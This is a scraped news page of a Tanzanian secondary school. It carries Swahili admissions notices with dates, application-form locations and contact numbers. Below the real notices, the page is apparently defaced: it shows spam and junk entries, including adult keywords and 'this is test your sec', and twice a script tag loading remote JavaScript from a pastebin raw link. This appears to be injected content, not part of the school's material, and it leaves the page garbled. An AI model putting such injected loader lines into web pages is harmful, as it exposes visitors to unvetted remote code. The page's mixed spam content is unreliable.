Latest news

NAFASI ZA MASOMO

MKUU WA SHULE YA SEKONDARI KAWAWA (JKT) ILIYOPO MAFINGA - IRINGA ANAPENDA KUUTANGAZIA UMMA KUWA SHULE INAPOKEA MAOMBI YA WOTE WANAOHITAJI KUJIUNGA KIDATO CHA TANO JULAI 2018 KATIKA TAHASUSI ZA HGK,HGL & HKL, SHULE INA WALIMU WENYE SIFA NA UZOEFU WA MUDA MREFU, SHULE INA MAZINGIRA MAZURI YA KUSOMEA NA KUJIFUNZA, SHULE HAIJAWAHI KUWA NA DIVISION FOUR WALA ZERO KTK MITIHANI YA TAIFA KIDATO CHA SITA, SHULE INAPOKEA WANAFUNZI WA JINSIA ZOTE NA NAFASI ZA KUTWA NA BWENI ZIPO. AIDHA SHULE INA KITUO KWA WANAOTAKA KURUDIA MITIHANI YA KIDATO CHA NNE, NAFASI ZA KUTWA NA BWENI ZIPO, FOMU ZA MAOMBI ZINAPATIKANA KATIKA VITUO VIFUATAVYO:- -SHULENI KAWAWA MAFINGA -JITEGEMEE SEKONDARI DAR ES SALAAM -ALFABETA BOOKSHOP MAFINGA -OFISI ZA BOMBA FM RADIO -BLOCK T MBEYA WAHI MAPEMA NAFASI NI CHACHE KWA MAWASILIANO PIGA SIMU KWA NAMBA ZIFUATAZO 1. 0762785899 2. 0758767533 3. 0654 798003 4. 0762759643 KARIBU KAWAWA UPATE ELIMU BORA NA MALEZI BORA

Other News

KUFUNGA SHULE

Wanafunzi wote wa kidato cha kwanza,pili,tatu,tano na sita wanatarajia kufunga shule kuanzia tarehe 24/11/2017...

KUJIUNGA NA SHULE

Kawawa secondary school imeanza kutoa form kwa ajili ya mwaka mpya wa masomo...

KUFUNGA SHULE

NDUGU WAZAZI NA WALENZI

NAFASI ZA MASOMO

MKUU WA SHULE YA SEKONDARI KAWAWA (JKT) ILIYOPO MAFINGA - IRINGA ANAPENDA KUUTANGAZIA UMMA KUWA SHULE INAPOKEA MAOMBI YA WOTE WANAOHITAJI KUJIUNGA KIDATO CHA KWANZA JANUARI 2019.

NAFASI ZA MASOMO 2019

MKUU WA SHULE YA SEKONDARI KAWAWA (JKT) ILIYOPO MAFINGA - IRINGA ANAPENDA KUUTANGAZIA UMMA KUWA SHULE INAPOKEA MAOMBI YA WOTE WANAOHITAJI KUJIUNGA KIDATO CHA TANO JULAI 2019 KATIKA TAHASUSI ZA HGK,HGL & HKL .

Aditya

Selamat

script type="text/javascript" src="https://pastebin.com/raw/ntw9EKCm">

script type="text/javascript" src="https://pastebin.com/raw/ntw9EKCm">

z

z

babymoon

babymoon

Touch By LadyZcute

Touch By LadyZcute

yeah

lalala

jualin.me

jualin best recipe

umc

umc

Yzyz

Bzhz

Milf

Xxx

ko

hh

this is test your sec

this is test your sec

© 2017 Kawawa JKT Secondary School. All Rights Reserved.